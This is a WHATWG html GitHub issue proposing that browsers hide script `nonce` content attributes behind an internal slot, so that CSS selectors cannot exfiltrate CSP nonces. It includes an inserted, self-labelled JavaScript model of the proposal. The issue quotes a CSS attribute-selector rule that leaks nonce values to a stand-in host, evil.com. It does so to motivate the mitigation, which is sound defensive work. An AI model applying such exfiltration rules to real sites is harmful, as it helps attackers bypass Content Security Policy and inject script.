Consider hiding nonce content attributes · Issue #2369 · whatwg/html
We've seen some recent attacks on CSP which rely on the ability to exfiltrate nonce data via various mechanisms that can grab data from content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors, values can be sent out to an attacker's server for reuse (`script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); }`). Chrome is experimenting with some changes that might help mitigate this risk, which seems fairly robust:
- When parsing a `<script>` tag with a `nonce` attribute, copy the attribute's value into an internal `[[nonce]]` slot on the element, and then overwrite the content attribute's value with the empty string.
- When changing the value of the content attribute (e.g. via `setAttributeValue`), update the value of the internal `[[nonce]]` slot.
- When running a script, pass in the `[[nonce]]` slot's value rather than the content attribute's value as the cryptographic nonce metadata to be used when fetching the script resource.
- The `nonce` IDL attribute on `HTMLScriptElement`'s getter returns the value of the internal `[[nonce]]` slot. Its setter sets the internal `[[nonce]]` slot's value. This enables JavaScript to retain access to the nonce value to manually propagate trust to scripts they require.
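To make the four steps concrete, here is a constructed JavaScript model of the proposed behaviour. It is an added example, not code from the issue, from Chromium or from the linked tests; the `ModelScriptElement` class, its `parse` helper, the `attributeSelectorMatches` selector stand-in, `scriptAllowedByNonce` and the nonce value are all assumptions made for illustration. It contrasts an element parsed the old way with one parsed under the proposal and checks what a CSS attribute selector, `getAttribute()`, the IDL attribute and the fetch each see.

```javascript
// Constructed model of the proposed [[nonce]] slot (added example, not browser
// or Chromium code). A Map of content attributes stands in for what
// getAttribute() and CSS attribute selectors can observe.
class ModelScriptElement {
  #nonce = "";        // internal [[nonce]] slot
  #attrs = new Map(); // content attributes

  // Step 1: when the parser sees a nonce content attribute, copy its value into
  // the [[nonce]] slot and overwrite the content attribute with "".
  // hideNonce=false models the pre-change behaviour for comparison.
  static parse(attrs, hideNonce = true) {
    const el = new ModelScriptElement();
    for (const [name, value] of Object.entries(attrs)) el.#attrs.set(name, String(value));
    if (el.#attrs.has("nonce")) {
      el.#nonce = el.#attrs.get("nonce");
      if (hideNonce) el.#attrs.set("nonce", "");
    }
    return el;
  }

  // Step 2: a later change to the content attribute updates the slot. The issue
  // text does not say the new value is hidden as well, so this model leaves it
  // visible in the content attribute (assumption).
  setAttribute(name, value) {
    value = String(value);
    this.#attrs.set(name, value);
    if (name === "nonce") this.#nonce = value;
  }

  getAttribute(name) { return this.#attrs.has(name) ? this.#attrs.get(name) : null; }

  // Step 4: the nonce IDL attribute reads and writes the slot, never the content
  // attribute, so script can still propagate trust to other scripts.
  get nonce() { return this.#nonce; }
  set nonce(value) { this.#nonce = String(value); }

  // Step 3: the value handed to the fetch as cryptographic nonce metadata.
  cryptographicNonceMetadata() { return this.#nonce; }
}

// Hand-written CSS attribute-selector matching (=, ^=, $=, *=, ~=). The point is
// that a selector can only ever see the content attribute, never the slot.
function attributeSelectorMatches(el, name, op, arg) {
  const value = el.getAttribute(name);
  if (value === null) return false;
  switch (op) {
    case "=":  return value === arg;
    case "^=": return arg !== "" && value.startsWith(arg);
    case "$=": return arg !== "" && value.endsWith(arg);
    case "*=": return arg !== "" && value.includes(arg);
    case "~=": return arg !== "" && !/\s/.test(arg) && value.split(/\s+/).includes(arg);
    default:   throw new Error(`unsupported attribute operator ${op}`);
  }
}

// CSP side: a nonce-source matches when the element's cryptographic nonce
// metadata equals one of the nonces in the policy.
function scriptAllowedByNonce(el, policyNonces) {
  const nonce = el.cryptographicNonceMetadata();
  return nonce !== "" && policyNonces.includes(nonce);
}

// Walks through the four steps and reports what each observer sees.
function demo() {
  const nonce = "r4nd0mN0nc3";  // constructed value, not a real nonce
  const legacy = ModelScriptElement.parse({ nonce }, false);
  const hidden = ModelScriptElement.parse({ nonce });

  // Trust propagation via the IDL attribute (step 4) for a script created later.
  const propagated = new ModelScriptElement();
  propagated.nonce = hidden.nonce;

  // Step 2: a nonce set through the content attribute still drives the fetch.
  const rotated = ModelScriptElement.parse({ nonce });
  rotated.setAttribute("nonce", "second");

  return {
    legacyPrefixMatch:  attributeSelectorMatches(legacy, "nonce", "^=", "r4n"),
    legacyWordMatch:    attributeSelectorMatches(legacy, "nonce", "~=", nonce),
    hiddenPrefixMatch:  attributeSelectorMatches(hidden, "nonce", "^=", "r4n"),
    hiddenWordMatch:    attributeSelectorMatches(hidden, "nonce", "~=", nonce),
    hiddenContentAttr:  hidden.getAttribute("nonce"),
    hiddenIdlAttr:      hidden.nonce,
    legacyFetchAllowed: scriptAllowedByNonce(legacy, [nonce]),
    hiddenFetchAllowed: scriptAllowedByNonce(hidden, [nonce]),
    propagatedContentAttr:  propagated.getAttribute("nonce"),
    propagatedFetchAllowed: scriptAllowedByNonce(propagated, [nonce]),
    rotatedSlot:            rotated.nonce,
    rotatedOldNonceAllowed: scriptAllowedByNonce(rotated, [nonce]),
  };
}
```

Running `demo()` shows the intended split: the legacy element leaks to both the prefix and word-match selectors, the hidden element matches neither because its content attribute is now `""`, yet `hidden.nonce` and the fetch still see the original value, and a script that received its nonce only through the IDL setter never exposes a content attribute at all.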
We'd want to do the above for every element that supports a `nonce` attribute. Some folks on the team suggest that it might actually be nice to extend this behavior to every element. That is, move this up to `Element` (or `Node`?) rather than special-casing the three elements that currently support nonces. If we extend nonce support to other resource types (as I'm told Mozilla has already done with images?), this might be more reasonable than special-casing even more elements.
The tests associated with https://codereview.chromium.org/2628733005 and https://codereview.chromium.org/2644143005 might help explain the expectations.
@arturjanc, @mikispag, and @lweichselbaum have opinions. I hope folks like @annevk, @mozfreddyb, @ckerschb, @dveditz, @hillbrad, @devd, @johnwilander, and @teddink also have opinions.